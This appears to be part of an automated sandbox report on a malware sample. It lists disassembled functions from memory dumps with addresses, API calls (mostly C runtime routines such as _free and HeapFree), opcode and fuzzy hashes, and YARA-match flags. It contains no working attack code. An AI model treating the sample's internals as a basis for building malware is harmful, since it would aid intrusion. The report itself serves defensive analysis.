                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                              • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction Fuzzy Hash:
                                                              Function 0040D949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000D955,0040D4EB), ref: 0040D94E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                              • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction Fuzzy Hash:
                                                              Function 0218297C Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction ID: 66a85d118b54bee3bc3cc58e85d7d4f85ee5d3ccdd0858b1daf6c4d57af983c4
                                                              • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction Fuzzy Hash: 95515930AC46C89AFB3FBE6889D47BE679A9F01308F08041ADC82E7A91D771D945CF51
                                                              Function 0218274A Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction ID: d382f1aad1799511db79056f439b06b71b5eef6ff719d2bd3963ecced05497c3
                                                              • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction Fuzzy Hash: 4D511570AC07C86ADF3BBA6988D47BE77DAAB52308F04042ECC82D7281D7359945CE52
                                                              Function 004124E3 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction ID: 760798cd14c0c86bed722a4dd279e5522f8c51e663d9525b9623c5e101cee0d5
                                                              • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction Fuzzy Hash: 9F51357020064876DB388A289BE67FF679B9B16308F54041FD486D73C1D6DD9DE6820E
                                                              Function 00412715 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction ID: 853e48f0d740310cc3a7760be4e74d6cb6a6f8b251400cc0940caf2d61d52f37
                                                              • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction Fuzzy Hash: 5F51777060064996EB3CAA2D8B957FFA799AB01304F14011FD892D73D1D6DC9EF6831E
                                                              Function 00424DFF Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uTB
                                                              • API String ID: 0-3950955333
                                                              • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction ID: feb5b225c8a083bfb470cfa5e0dae61ad3f57a9261c2ea5476071e4c46a7d3ba
                                                              • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction Fuzzy Hash: 3C21B673F20539477B0CC47E8C5227DB6E1D78C501745423EF8A6EA2C1D968D917E2E4
                                                              Function 0041C9A9 Relevance: .6, Instructions: 637COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                              • Instruction ID: d0e7df19af42a2597c1c9a0a4d59ec128da6f77e801e7a5f5831370ed6b1a342
                                                              • Opcode Fuzzy Hash: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                              • Instruction Fuzzy Hash: 50321672E65F014DD7239634C86233A6249AFB73C4F55D737F81AB5AA5EB29C4C34104
                                                              Function 02195066 Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction ID: 2b3a4cad4db4d83fd762e312e2b7a61b942242056453729931060dcfca4c33a9
                                                              • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction Fuzzy Hash: 3021B673F205395B7B0CC47E8C5227DB6E1C68C501745423AF8A6EA2C1D968D917E2E4
                                                              Function 02194F46 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction ID: 874a584c079d6cbeb6f5eabab9eaedd3a1f5ccbc055af7ab4e481e00275099ca
                                                              • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction Fuzzy Hash: 49117333F30C255A6B5C816D8C172BAA5D6EBD825074F533AD826E7284E9A4DE13D290
                                                              Function 00424CDF Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction ID: 54cccbac12d7b0a806302a64698748c03833c4b2bf86144adce5760e1b7c8ced
                                                              • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction Fuzzy Hash: 9511A333F30C255A675C81698C172BAA1D2EBD824034F533AD826EB284E9A4DE23D290
                                                              Function 0217EBF7 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 6ec3b3a6773a7d6e7410f7d2b63b3ad8c9150c732b1bde7dbca6510266de66e2
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 501127BF2C014A47E61B8A2DD5B42B6A7F9EBC512873D42FAD0828F758D322E144D600
                                                              Function 0040E990 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 1c530e7fa6924d9775cb3f61f4bfdae9f72d3837fde0802971f232fe1001d1b0
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 22112BF730105183D6A4863FC8B46B7A795FBCA32072C4B7BE1816B7D4D13AE965DA08
                                                              Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                              Function 007AAA23 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 1dba8607ed648125447f2d4f31f12ff64bc79c31ae6477ff173cf81eb95c623d
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 95118E72340100AFDB44DF59DD81EA673EAEB8A320B298165ED09CB312D779EC42C760
                                                              Function 02170D90 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 5edd786cd43c79b7283201332adfa0d70d5c543a0a79b86af67657a73ec68d09
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: C7012672A507008FDF21CF60C804BAA33F5FBCA206F1540B9D90AD7381E770A841CB80
                                                              Function 0218BB80 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction ID: fea5500236d8e45452d6d1c6df396d94c1602311ee763e81dc28c8ce33e409f2
                                                              • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction Fuzzy Hash: 5CE08C72A56228EFCB24EB98C98498AF3ECEB44B09B11049AB501D3200C371DF00CBD0
                                                              Function 0041B919 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction ID: 91f9cbf9c998b6b154933009beec7cf969d7c2669516eed5026d1d53449b0fde
                                                              • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction Fuzzy Hash: F9E08C72921268EBCB14DBC9CA0498AF3ECEB45B54B1504ABF601D3200C278DE41C7D4
                                                              Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                              • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                              • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                              • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                              Function 021906E1 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 02190725
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9AA
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9BC
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9CE
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9E0
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9F2
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA04
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA16
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA28
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA3A
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA4C
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA5E
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA70
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA82
                                                              • _free.LIBCMT ref: 0219071A
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 0219073C
                                                              • _free.LIBCMT ref: 02190751
                                                              • _free.LIBCMT ref: 0219075C
                                                              • _free.LIBCMT ref: 0219077E
                                                              • _free.LIBCMT ref: 02190791
                                                              • _free.LIBCMT ref: 0219079F
                                                              • _free.LIBCMT ref: 021907AA
                                                              • _free.LIBCMT ref: 021907E2
                                                              • _free.LIBCMT ref: 021907E9
                                                              • _free.LIBCMT ref: 02190806
                                                              • _free.LIBCMT ref: 0219081E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: qC$PrC
                                                              • API String ID: 161543041-1020004248
                                                              • Opcode ID: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                              • Instruction ID: 631dd1fc525022a0197a365e6e8cda2c2f63db05b7e96b174b8db7845a55115d
                                                              • Opcode Fuzzy Hash: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                              • Instruction Fuzzy Hash: 86311B31A84705DFEF26AF38D884B6677EAEF04724F144429E499D7290DB75A880CF60
                                                              Function 0042047A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 004204BE
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F743
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F755
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F767
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F779
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F78B
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F79D
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7AF
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7C1
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7D3
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7E5
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7F7
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F809
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F81B
                                                              • _free.LIBCMT ref: 004204B3
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 004204D5
                                                              • _free.LIBCMT ref: 004204EA
                                                              • _free.LIBCMT ref: 004204F5
                                                              • _free.LIBCMT ref: 00420517
                                                              • _free.LIBCMT ref: 0042052A
                                                              • _free.LIBCMT ref: 00420538
                                                              • _free.LIBCMT ref: 00420543
                                                              • _free.LIBCMT ref: 0042057B
                                                              • _free.LIBCMT ref: 00420582
                                                              • _free.LIBCMT ref: 0042059F
                                                              • _free.LIBCMT ref: 004205B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: tqC
                                                              • API String ID: 161543041-1967669507
                                                              • Opcode ID: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                              • Instruction ID: 89d3e0614c1888e3876d50c63e7448c9468b58a50f4c13281cf391deb725330b
                                                              • Opcode Fuzzy Hash: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                              • Instruction Fuzzy Hash: 89315D71701615AFEB20AA79E845B9B73E8AF00314F50841BE458D7252DB78EDC0CB29
                                                              Function 0041F824 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 373COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC
                                                              • API String ID: 269201875-1967669507
                                                              • Opcode ID: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                              • Instruction ID: a4bface3bf681dc86b1305e01607c601c26d64039dea510868fa8c22d2e6bb15
                                                              • Opcode Fuzzy Hash: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                              • Instruction Fuzzy Hash: 72C12771E40205ABDB20DB99CC42FDF77F89F48704F54416AFA05FB282E674AD858BA4
                                                              Function 02185697 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                              • Instruction ID: 9405c1da7363b7127f2025766f048245102d0283adee8a4a524ed52fa76f7260
                                                              • Opcode Fuzzy Hash: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                              • Instruction Fuzzy Hash: 02D18B71D40206AFDB11EFA9C8C0BAEBBF6FF08310F55416AE895A7281D771A945CF60
                                                              Function 00415430 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                              • Instruction ID: 1d6b25825914aaa7f5d743abe57cff5c904706fedcceaf39c4cb1f3fede375c7
                                                              • Opcode Fuzzy Hash: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                              • Instruction Fuzzy Hash: 8BD19C71E00605DFDB11DFA9C881BEEBBB5BF48304F14452EE495A7382D778A885CB68
                                                              Function 0040D024 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0040D002), ref: 0040D030
                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040D002), ref: 0040D03B
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040D002), ref: 0040D04C
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040D05E
                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040D06C
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040D002), ref: 0040D08F
                                                              • DeleteCriticalSection.KERNEL32(004383D4,00000007,?,?,0040D002), ref: 0040D0AB
                                                              • CloseHandle.KERNEL32(00000000,?,?,0040D002), ref: 0040D0BB
                                                              Strings
                                                              • WakeAllConditionVariable, xrefs: 0040D064
                                                              • kernel32.dll, xrefs: 0040D047
                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040D036
